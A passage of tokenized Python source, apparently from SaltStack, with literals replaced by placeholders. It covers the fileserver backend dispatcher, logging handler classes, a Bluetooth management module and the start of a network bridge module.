. rsplit ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> except ValueError : <EOL> log . warning ( ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . format ( file_ ) ) <EOL> continue <EOL> ret = find_func ( filename , saltenv = saltenv ) <EOL> if ret [ '<STR_LIT:path>' ] == '<STR_LIT>' : <EOL> os . unlink ( file_path ) <EOL> def is_file_ignored ( opts , fname ) : <EOL> '''<STR_LIT>''' <EOL> if opts [ '<STR_LIT>' ] : <EOL> for regex in opts [ '<STR_LIT>' ] : <EOL> if re . search ( regex , fname ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> fname <EOL> ) <EOL> ) <EOL> return True <EOL> if opts [ '<STR_LIT>' ] : <EOL> for glob in opts [ '<STR_LIT>' ] : <EOL> if fnmatch . fnmatch ( fname , glob ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> fname <EOL> ) <EOL> ) <EOL> return True <EOL> return False <EOL> def clear_lock ( clear_func , role , remote = None , lock_type = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> msg = '<STR_LIT>' . format ( lock_type , role ) <EOL> if remote : <EOL> msg += '<STR_LIT>' . format ( remote ) <EOL> log . debug ( msg ) <EOL> return clear_func ( remote = remote , lock_type = lock_type ) <EOL> class Fileserver ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> self . servers = salt . loader . fileserver ( opts , opts [ '<STR_LIT>' ] ) <EOL> def _gen_back ( self , back ) : <EOL> '''<STR_LIT>''' <EOL> if not back : <EOL> back = self . opts [ '<STR_LIT>' ] <EOL> else : <EOL> try : <EOL> back = back . split ( '<STR_LIT:U+002C>' ) <EOL> except AttributeError : <EOL> back = six . text_type ( back ) . split ( '<STR_LIT:U+002C>' ) <EOL> ret = [ ] <EOL> if not isinstance ( back , list ) : <EOL> return ret <EOL> try : <EOL> subtract_only = all ( ( x . startswith ( '<STR_LIT:->' ) for x in back ) ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> if subtract_only : <EOL> ret = self . opts [ '<STR_LIT>' ] <EOL> for sub in back : <EOL> if '<STR_LIT>' . format ( sub [ <NUM_LIT:1> : ] ) in self . servers : <EOL> ret . remove ( sub [ <NUM_LIT:1> : ] ) <EOL> elif '<STR_LIT>' . format ( sub [ <NUM_LIT:1> : - <NUM_LIT:2> ] ) in self . servers : <EOL> ret . remove ( sub [ <NUM_LIT:1> : - <NUM_LIT:2> ] ) <EOL> return ret <EOL> for sub in back : <EOL> if '<STR_LIT>' . format ( sub ) in self . servers : <EOL> ret . append ( sub ) <EOL> elif '<STR_LIT>' . format ( sub [ : - <NUM_LIT:2> ] ) in self . servers : <EOL> ret . append ( sub [ : - <NUM_LIT:2> ] ) <EOL> return ret <EOL> def master_opts ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> return self . opts <EOL> def update_opts ( self ) : <EOL> for name , func in self . servers . items ( ) : <EOL> try : <EOL> if '<STR_LIT>' in func . __globals__ : <EOL> func . __globals__ [ '<STR_LIT>' ] . update ( self . opts ) <EOL> except AttributeError : <EOL> pass <EOL> def clear_cache ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> cleared = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> log . debug ( '<STR_LIT>' . format ( fsb ) ) <EOL> failed = self . servers [ fstr ] ( ) <EOL> if failed : <EOL> errors . extend ( failed ) <EOL> else : <EOL> cleared . append ( <EOL> '<STR_LIT>' <EOL> . format ( fsb ) <EOL> ) <EOL> return cleared , errors <EOL> def lock ( self , back = None , remote = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> locked = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> msg = '<STR_LIT>' . format ( fsb ) <EOL> if remote : <EOL> if not isinstance ( remote , six . string_types ) : <EOL> errors . append ( <EOL> '<STR_LIT>' <EOL> . format ( remote ) <EOL> ) <EOL> continue <EOL> else : <EOL> msg += '<STR_LIT>' . format ( remote ) <EOL> log . debug ( msg ) <EOL> good , bad = self . servers [ fstr ] ( remote = remote ) <EOL> locked . extend ( good ) <EOL> errors . extend ( bad ) <EOL> return locked , errors <EOL> def clear_lock ( self , back = None , remote = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> cleared = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> good , bad = clear_lock ( self . servers [ fstr ] , <EOL> fsb , <EOL> remote = remote ) <EOL> cleared . extend ( good ) <EOL> errors . extend ( bad ) <EOL> return cleared , errors <EOL> def update ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> log . debug ( '<STR_LIT>' . format ( fsb ) ) <EOL> self . servers [ fstr ] ( ) <EOL> def envs ( self , back = None , sources = False ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> ret = set ( ) <EOL> if sources : <EOL> ret = { } <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if sources : <EOL> ret [ fsb ] = self . servers [ fstr ] ( ) <EOL> else : <EOL> ret . update ( self . servers [ fstr ] ( ) ) <EOL> if sources : <EOL> return ret <EOL> return list ( ret ) <EOL> def init ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> self . servers [ fstr ] ( ) <EOL> def find_file ( self , path , saltenv , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> kwargs = { } <EOL> fnd = { '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if os . path . isabs ( path ) : <EOL> return fnd <EOL> if '<STR_LIT>' in path : <EOL> return fnd <EOL> if salt . utils . url . is_escaped ( path ) : <EOL> path = salt . utils . url . unescape ( path ) <EOL> else : <EOL> if '<STR_LIT:?>' in path : <EOL> hcomps = path . split ( '<STR_LIT:?>' ) <EOL> path = hcomps [ <NUM_LIT:0> ] <EOL> comps = hcomps [ <NUM_LIT:1> ] . split ( '<STR_LIT:&>' ) <EOL> for comp in comps : <EOL> if '<STR_LIT:=>' not in comp : <EOL> continue <EOL> args = comp . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> kwargs [ args [ <NUM_LIT:0> ] ] = args [ <NUM_LIT:1> ] <EOL> if '<STR_LIT>' in kwargs : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> saltenv = kwargs . pop ( '<STR_LIT>' ) <EOL> if not isinstance ( saltenv , six . string_types ) : <EOL> saltenv = six . text_type ( saltenv ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> fnd = self . servers [ fstr ] ( path , saltenv , ** kwargs ) <EOL> if fnd . get ( '<STR_LIT:path>' ) : <EOL> fnd [ '<STR_LIT>' ] = fsb <EOL> return fnd <EOL> return fnd <EOL> def serve_file ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:data>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT:path>' not in load or '<STR_LIT>' not in load or '<STR_LIT>' not in load : <EOL> return ret <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> fnd = self . find_file ( load [ '<STR_LIT:path>' ] , load [ '<STR_LIT>' ] ) <EOL> if not fnd . get ( '<STR_LIT>' ) : <EOL> return ret <EOL> fstr = '<STR_LIT>' . format ( fnd [ '<STR_LIT>' ] ) <EOL> if fstr in self . servers : <EOL> return self . servers [ fstr ] ( load , fnd ) <EOL> return ret <EOL> def file_hash ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT:path>' not in load or '<STR_LIT>' not in load : <EOL> return '<STR_LIT>' <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> fnd = self . find_file ( salt . utils . locales . sdecode ( load [ '<STR_LIT:path>' ] ) , <EOL> load [ '<STR_LIT>' ] ) <EOL> if not fnd . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> fstr = '<STR_LIT>' . format ( fnd [ '<STR_LIT>' ] ) <EOL> if fstr in self . servers : <EOL> return self . servers [ fstr ] ( load , fnd ) <EOL> return '<STR_LIT>' <EOL> def file_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def file_list_emptydirs ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( None ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def dir_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def symlink_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = { } <EOL> if '<STR_LIT>' not in load : <EOL> return { } <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> symlstr = '<STR_LIT>' . format ( fsb ) <EOL> if symlstr in self . servers : <EOL> ret = self . servers [ symlstr ] ( load ) <EOL> ret = dict ( [ <EOL> ( salt . utils . locales . sdecode ( x ) , salt . utils . locales . sdecode ( y ) ) for x , y in ret . items ( ) <EOL> ] ) <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = dict ( [ <EOL> ( x , y ) for x , y in six . iteritems ( ret ) if x . startswith ( prefix ) <EOL> ] ) <EOL> return ret <EOL> class FSChan ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , ** kwargs ) : <EOL> self . opts = opts <EOL> self . kwargs = kwargs <EOL> self . fs = Fileserver ( self . opts ) <EOL> self . fs . init ( ) <EOL> self . fs . update ( ) <EOL> self . cmd_stub = { '<STR_LIT>' : { } } <EOL> def send ( self , load , tries = None , timeout = None ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in load : <EOL> log . error ( '<STR_LIT>' . format ( load ) ) <EOL> return { } <EOL> cmd = load [ '<STR_LIT>' ] . lstrip ( '<STR_LIT:_>' ) <EOL> if cmd in self . cmd_stub : <EOL> return self . cmd_stub [ cmd ] <EOL> if cmd == '<STR_LIT>' : <EOL> return self . fs . envs ( ) <EOL> if not hasattr ( self . fs , cmd ) : <EOL> log . error ( '<STR_LIT>' . format ( load ) ) <EOL> return { } <EOL> return getattr ( self . fs , cmd ) ( load ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import atexit <EOL> import logging <EOL> import threading <EOL> import logging . handlers <EOL> from salt . log . mixins import NewStyleClassMixIn , ExcInfoOnLogLevelFormatMixIn <EOL> log = logging . getLogger ( __name__ ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> class NullHandler ( logging . Handler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> def handle ( self , record ) : <EOL> pass <EOL> def emit ( self , record ) : <EOL> pass <EOL> def createLock ( self ) : <EOL> self . lock = None <EOL> logging . NullHandler = NullHandler <EOL> class TemporaryLoggingHandler ( logging . NullHandler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , level = logging . NOTSET , max_queue_size = <NUM_LIT> ) : <EOL> self . __max_queue_size = max_queue_size <EOL> super ( TemporaryLoggingHandler , self ) . __init__ ( level = level ) <EOL> self . __messages = [ ] <EOL> def handle ( self , record ) : <EOL> self . acquire ( ) <EOL> if len ( self . __messages ) >= self . __max_queue_size : <EOL> self . __messages . pop ( <NUM_LIT:0> ) <EOL> self . __messages . append ( record ) <EOL> self . release ( ) <EOL> def sync_with_handlers ( self , handlers = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> if not handlers : <EOL> return <EOL> while self . __messages : <EOL> record = self . __messages . pop ( <NUM_LIT:0> ) <EOL> for handler in handlers : <EOL> if handler . level > record . levelno : <EOL> continue <EOL> handler . handle ( record ) <EOL> class StreamHandler ( ExcInfoOnLogLevelFormatMixIn , logging . StreamHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> class FileHandler ( ExcInfoOnLogLevelFormatMixIn , logging . FileHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> class SysLogHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . SysLogHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> if sys . version_info > ( <NUM_LIT:2> , <NUM_LIT:6> ) : <EOL> class WatchedFileHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . WatchedFileHandler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:2> ) : <EOL> class QueueHandler ( ExcInfoOnLogLevelFormatMixIn , logging . Handler , NewStyleClassMixIn ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , queue ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . queue = queue <EOL> def enqueue ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put_nowait ( record ) <EOL> def prepare ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . format ( record ) <EOL> record . msg = record . getMessage ( ) <EOL> record . args = None <EOL> record . exc_info = None <EOL> return record <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> self . enqueue ( self . prepare ( record ) ) <EOL> except Exception : <EOL> self . handleError ( record ) <EOL> else : <EOL> class QueueHandler ( ExcInfoOnLogLevelFormatMixIn , logging . handlers . QueueHandler ) : <EOL> pass </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . ext . six . moves import shlex_quote as _cmd_quote <EOL> import salt . utils . validate . net <EOL> from salt . exceptions import CommandExecutionError <EOL> log = logging . getLogger ( __name__ ) <EOL> HAS_PYBLUEZ = False <EOL> try : <EOL> import bluetooth <EOL> HAS_PYBLUEZ = True <EOL> except ImportError : <EOL> pass <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:address>' <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if HAS_PYBLUEZ : <EOL> return __virtualname__ <EOL> return ( False , '<STR_LIT>' ) <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> bluez_version = out [ <NUM_LIT:0> ] <EOL> pybluez_version = '<STR_LIT>' <EOL> try : <EOL> pybluez_version = bluetooth . __version__ <EOL> except Exception as exc : <EOL> pass <EOL> return { '<STR_LIT>' : bluez_version , '<STR_LIT>' : pybluez_version } <EOL> def address_ ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> dev = '<STR_LIT>' <EOL> for line in out : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> comps = line . split ( '<STR_LIT::>' ) <EOL> dev = comps [ <NUM_LIT:0> ] <EOL> ret [ dev ] = { <EOL> '<STR_LIT>' : dev , <EOL> '<STR_LIT:path>' : '<STR_LIT>' . format ( dev ) , <EOL> } <EOL> if '<STR_LIT>' in line : <EOL> comps = line . split ( ) <EOL> ret [ dev ] [ '<STR_LIT:address>' ] = comps [ <NUM_LIT:2> ] <EOL> if '<STR_LIT>' in line : <EOL> ret [ dev ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' in line : <EOL> ret [ dev ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> def power ( dev , mode ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( '<STR_LIT>' ) <EOL> if mode == '<STR_LIT>' or mode is True : <EOL> state = '<STR_LIT>' <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> state = '<STR_LIT>' <EOL> mode = '<STR_LIT>' <EOL> cmd = '<STR_LIT>' . format ( dev , state ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> info = address_ ( ) <EOL> if info [ dev ] [ '<STR_LIT>' ] == mode : <EOL> return True <EOL> return False <EOL> def discoverable ( dev ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if '<STR_LIT>' in out : <EOL> return True <EOL> return False <EOL> def noscan ( dev ) : <EOL> '''<STR_LIT>''' <EOL> if dev not in address_ ( ) : <EOL> raise CommandExecutionError ( '<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> cmd = '<STR_LIT>' . format ( dev ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if '<STR_LIT>' in out : <EOL> return False <EOL> return True <EOL> def scan ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> devices = bluetooth . discover_devices ( lookup_names = True ) <EOL> for device in devices : <EOL> ret . append ( { device [ <NUM_LIT:0> ] : device [ <NUM_LIT:1> ] } ) <EOL> return ret <EOL> def block ( bdaddr ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( bdaddr ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( bdaddr ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> def unblock ( bdaddr ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( bdaddr ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( bdaddr ) <EOL> __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> def pair ( address , key ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( address ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> try : <EOL> int ( key ) <EOL> except Exception : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> addy = address_ ( ) <EOL> cmd = '<STR_LIT>' . format ( <EOL> _cmd_quote ( addy [ '<STR_LIT>' ] ) , _cmd_quote ( address ) , _cmd_quote ( key ) <EOL> ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = True ) . splitlines ( ) <EOL> return out <EOL> def unpair ( address ) : <EOL> '''<STR_LIT>''' <EOL> if not salt . utils . validate . net . mac ( address ) : <EOL> raise CommandExecutionError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cmd = '<STR_LIT>' . format ( address ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> return out <EOL> def start ( ) : <EOL> '''<STR_LIT>''' <EOL> out = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return out <EOL> def stop ( ) : <EOL> '''<STR_LIT>''' <EOL> out = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return out </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import re <EOL> import salt . utils <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:list>' <EOL> } <EOL> SUPPORTED_BSD_LIKE = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> supported_os_tool = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> cur_os = __grains__ [ '<STR_LIT>' ] <EOL> for _os in supported_os_tool : <EOL> if cur_os == _os and salt . utils . which ( supported_os_tool [ cur_os ] ) : <EOL> return True <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _tool_path ( ostool ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . which ( ostool ) <EOL> def _linux_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> if br : <EOL> cmd = '<STR_LIT>' . format ( brctl , br ) <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( brctl ) <EOL> brs = { } <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> vals = line . split ( ) <EOL> if not vals : <EOL> continue <EOL> if len ( vals ) > <NUM_LIT:1> : <EOL> brname = vals [ <NUM_LIT:0> ] <EOL> brs [ brname ] = { <EOL> '<STR_LIT:id>' : vals [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : vals [ <NUM_LIT:2> ] , <EOL> } <EOL> if len ( vals ) > <NUM_LIT:3> : <EOL> brs [ brname ] [ '<STR_LIT>' ] = [ vals [ <NUM_LIT:3> ] ] <EOL> if len ( vals ) == <NUM_LIT:1> and brname : <EOL> brs [ brname ] [ '<STR_LIT>' ] . append ( vals [ <NUM_LIT:0> ] ) <EOL> if br : <EOL> try : <EOL> return brs [ br ] <EOL> except KeyError : <EOL> return None <EOL> return brs <EOL> def _linux_bradd ( br ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br ) , <EOL> python_shell = False ) <EOL> def _linux_brdel ( br ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br ) , <EOL> python_shell = False ) <EOL> def _linux_addif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , iface ) , <EOL> python_shell = False ) <EOL> def _linux_delif ( br , iface ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , iface ) , <EOL> python_shell = False ) <EOL> def _linux_stp ( br , state ) : <EOL> '''<STR_LIT>''' <EOL> brctl = _tool_path ( '<STR_LIT>' ) <EOL> return __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' . format ( brctl , br , state ) , <EOL> python_shell = False ) <EOL> def _bsd_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> if __grains__ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return _netbsd_brshow ( br ) <EOL> ifconfig = _tool_path ( '<STR_LIT>' ) <EOL> ifaces = { } <EOL> if br : <EOL> ifaces [ br ] = br <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( ifconfig ) <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> ifaces [ line ] = line <EOL> brs = { } <EOL> for iface in ifaces : <EOL> cmd = '<STR_LIT>' . format ( ifconfig , iface ) <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( ) : <EOL> brs [ iface ] = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> line = line . lstrip ( ) <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> brs [ iface ] [ '<STR_LIT>' ] . append ( line . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:1> ] ) <EOL> if '<STR_LIT>' in line : <EOL> brs [ iface ] [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> if br : <EOL> return brs [ br ] <EOL> return brs <EOL> def _netbsd_brshow ( br = None ) : <EOL> '''<STR_LIT>''' <EOL> brconfig = _tool_path ( '<STR_LIT>' ) <EOL> if br : <EOL> cmd = '<STR_LIT>' . format ( brconfig , br ) <EOL> else : <EOL> cmd = '<STR_LIT>' . format ( brconfig ) <EOL> brs = { } <EOL> start_int = False <EOL> for line in __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) . splitlines ( 